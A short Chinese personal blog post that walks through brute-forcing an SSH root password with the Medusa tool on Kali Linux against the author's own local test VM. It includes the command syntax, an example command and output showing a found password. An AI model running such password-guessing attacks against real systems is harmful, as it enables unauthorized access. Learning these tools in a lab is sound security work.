一直想学好安全方面的知识,但苦于没门路,所以才开博,目的是记录自己学习的东西,同时也会以后学习这方面东西的兄弟提供些可参照物
kali是啥就没必要介绍了,里面有大量的安全工具,基本搞安全的兄弟对这玩意或多或少都有接触,在kaili里用于破解ssh登录密码的工具,比较常用的就是medusa,打开控制台,直接输入 :medusa就会跳出这个工具的使用帮助:
上面的语法提示告知了这个工具的使用方法,我在本地搭建了测试环境,并制作了自己破解常用的字典,破解步骤如下:
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
在本次破解,使用的破解语句:medusa -h 192.168.171.135 -u root -P test.txt -M ssh
破解 的含义也不复杂:破解的目标是192.168.171.135 用户名是root,如果不知道用户名,可以用-U,里面保护一堆用户名字典,这样破解的速度会增加,毕竟会不断的去匹配用户名和密码,密码字典是test.txt,破解的功能是ssh
执行破解就好了:
[code ]root@kali:~# medusa -h 192.168.171.130 -u root -P Desktop/text.txt -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (1 of 10 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 10 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (3 of 10 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: test234 (4 of 10 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.171.130 User: root Password: test234[SUCCESS]
root@kali:~#[/code]
这里出了点儿偏差:我的ip地址改了,因为我虚拟机里没装ssh。。。抱歉。。上面就测出登录密码了
很多事儿,上帝安排好了,凭着直觉去日吧
